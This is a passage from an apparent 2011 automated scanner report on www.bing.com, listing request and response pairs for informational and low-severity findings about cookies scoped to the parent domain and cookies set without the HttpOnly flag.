The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shopping HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:46:34 GMT
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:35 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=A2A898C7201E474486150618933AB2DB; domain=.bing.com; path=/
Content-Length: 90390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...

2.21. http://www.bing.com/shopping/binoculars/c/4378  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping/binoculars/c/4378

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shopping/binoculars/c/4378 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:45:33 GMT
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:45:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:45:34 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=6FA303C0EC0A468CBC9A123EAF0F8F57; domain=.bing.com; path=/
Content-Length: 89844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...

2.22. http://www.bing.com/shopping/classic-womens-fragrances/r/162  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping/classic-womens-fragrances/r/162

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shopping/classic-womens-fragrances/r/162 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:45:26 GMT
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:45:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:45:27 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=C0C28A6164ED41C38DC21B95216F1854; domain=.bing.com; path=/
Content-Length: 53787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...

2.23. http://www.bing.com/shopping/pet-litter-supplies/c/6874  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping/pet-litter-supplies/c/6874

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shopping/pet-litter-supplies/c/6874 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:45:58 GMT
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:45:59 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=55C1E3103C224B9EAF396B98665F1BA5; domain=.bing.com; path=/
Content-Length: 76539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...

2.24. http://www.bing.com/travel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /travel

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.bing.com/travel/
Date: Fri, 11 Feb 2011 21:46:56 GMT
Connection: close
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:55 GMT; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1297460815; domain=.bing.com; path=/
Set-Cookie: _SS=SID=130927E42C87488A80B3458098DA4E9D; domain=.bing.com; path=/


2.25. http://www.bing.com/travel/content/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /travel/content/search

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /travel/content/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:19 GMT
Content-Length: 22048
Connection: close
Set-Cookie: JSESSIONID=7EB8619940D62EA6532C729CCECB1A45; Path=/travel
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:19 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=3156FC6FA1B4456BB9BC9890E342EC52; domain=.bing.com; path=/


    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">

   

...[SNIP]...

2.26. http://www.bing.com/videos/browse  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/browse

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videos/browse HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=614
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:54:08 GMT
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:43:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:43:53 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=6992B41421FD424494A2E9A2F1D31BD9; domain=.bing.com; path=/
Content-Length: 163651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

2.27. http://www.bing.com/videos/results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/results.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/videos/browse
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Fri, 11 Feb 2011 21:43:52 GMT
Connection: close
Set-Cookie: VIDSCHUSR=CLICKMODE=0&VMUTE=0&PARTNER=0; expires=Sun, 10-Feb-2013 21:43:52 GMT; domain=.bing.com; path=/videos
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:43:52 GMT; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1297460632; domain=.bing.com; path=/
Set-Cookie: _SS=SID=D9A439CD6DD34C458F5BDF24BB030719; domain=.bing.com; path=/


2.28. http://www.bing.com/videos/watch/video/10-valentines-presents-you-should-probably-avoid/ufu8tt1z  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/10-valentines-presents-you-should-probably-avoid/ufu8tt1z

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videos/watch/video/10-valentines-presents-you-should-probably-avoid/ufu8tt1z HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:59:00 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.047 secs
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:44:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:00 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=2E275C0252494A33BD7C7B00733A78E2; domain=.bing.com; path=/
Content-Length: 73214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

2.29. http://www.bing.com/videos/watch/video/brad-pitt-picks-angelinas-outfits/17wgub818  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/brad-pitt-picks-angelinas-outfits/17wgub818

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videos/watch/video/brad-pitt-picks-angelinas-outfits/17wgub818 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:58:54 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.047 secs
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:43:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:43:54 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=3E58DCD97AD8436DB0D6F76EA649A7C4; domain=.bing.com; path=/
Content-Length: 68575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

2.30. http://www.bing.com/videos/watch/video/fully-fit-the-office-workout/1l0jbr4q7  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/fully-fit-the-office-workout/1l0jbr4q7

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videos/watch/video/fully-fit-the-office-workout/1l0jbr4q7 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:59:15 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.125 secs
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:44:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:15 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=A410FF9BF98B4F51BF7EF5A84D10EA58; domain=.bing.com; path=/
Content-Length: 73861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

2.31. http://www.bing.com/videos/watch/video/how-to-cover-up-a-tattoo/1iow3yvpv  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/how-to-cover-up-a-tattoo/1iow3yvpv

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videos/watch/video/how-to-cover-up-a-tattoo/1iow3yvpv HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=292
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:48:52 GMT
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:43:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:43:59 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=438B0C95E5964EF9BFC5329EA9644004; domain=.bing.com; path=/
Content-Length: 74286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

2.32. http://www.bing.com/videos/watch/video/idol-auditions-break-up-couple/17wypfnoa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/idol-auditions-break-up-couple/17wypfnoa

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videos/watch/video/idol-auditions-break-up-couple/17wypfnoa HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:59:12 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.078 secs
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:44:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:12 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=296FB50835524F1CAC808C6CC833F2EF; domain=.bing.com; path=/
Content-Length: 68455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

2.33. http://www.bing.com/videos/watch/video/tip-stress-and-love/1revqyosz  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/tip-stress-and-love/1revqyosz

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videos/watch/video/tip-stress-and-love/1revqyosz HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:59:23 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.047 secs
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:44:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:23 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=5F471059863C43D5904D61DB170BF835; domain=.bing.com; path=/
Content-Length: 72713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

3. Cookie without HttpOnly flag set  previous  next
There are 39 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



3.1. http://www.bing.com/travel/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/ HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: lbc=819; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-z4gm3vtmq19cv3yz780quprn4otsl_VID-z1oq4m4dn99d87yz72fovekggbn1v_UID-; Domain=.bing.com; Expires=Sun, 10-Feb-2013 21:46:12 GMT; Path=/travel
Set-Cookie: JSESSIONID=2C453B42A8BD6A784D623C2DF0E8BB7A; Domain=.bing.com; Path=/travel
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:12 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=3F8AAA80A722410C8B09878099EDA1CA; domain=.bing.com; path=/
Content-Length: 87698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...

3.2. http://www.bing.com/travel/content/search  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/content/search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/content/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:19 GMT
Content-Length: 22048
Connection: close
Set-Cookie: JSESSIONID=7EB8619940D62EA6532C729CCECB1A45; Path=/travel
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:19 GMT; domain=.bing.com; path=/
